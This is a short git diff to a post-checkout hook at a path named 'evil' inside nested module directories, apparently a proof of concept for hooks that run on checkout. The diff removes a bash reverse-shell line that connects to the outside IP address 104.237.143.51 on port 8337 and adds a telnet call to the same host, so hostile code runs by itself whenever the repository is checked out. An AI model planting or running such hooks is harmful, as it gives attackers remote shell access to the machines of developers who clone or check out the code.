diff --git a/modules/1/2/3/4/evil/hooks/post-checkout b/modules/1/2/3/4/evil/hooks/post-checkout index 1dc3754..f8b535d 100755 --- a/modules/1/2/3/4/evil/hooks/post-checkout +++ b/modules/1/2/3/4/evil/hooks/post-checkout @@ -1,2 +1,2 @@ #!/bin/sh -echo "sh -i >& /dev/tcp/104.237.143.51/8337 0>&1" | bash \ No newline at end of file +telnet 104.237.143.51 8337 \ No newline at end of file